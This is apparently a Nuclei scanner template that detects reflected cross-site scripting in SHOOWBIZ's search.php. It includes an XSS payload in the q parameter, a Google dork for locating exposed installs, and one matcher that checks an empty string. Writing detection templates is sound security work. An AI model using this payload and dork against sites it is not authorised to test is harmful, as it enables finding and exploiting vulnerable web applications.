id: shoowbiz-xss info: name: SHOOWBIZ - Cross Site Scripting author: r3Y3r53 severity: medium description: | Cross-Site Scripting, is a type of security vulnerability commonly found in web applications. It occurs when an attacker injects malicious scripts (typically written in JavaScript) into web pages viewed by other users. reference: - https://www.exploitalert.com/view-details.html?id=36000 metadata: max-request: 1 verified: true google-drok: inurl:"search.php?q=" tags: shoowbiz,xss http: - method: GET path: - "{{BaseURL}}/search.php?q=%3CScRipT%3Ealert(document.domain);%3C/ScRipT%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "")' - 'contains(body, "Search result in")' condition: and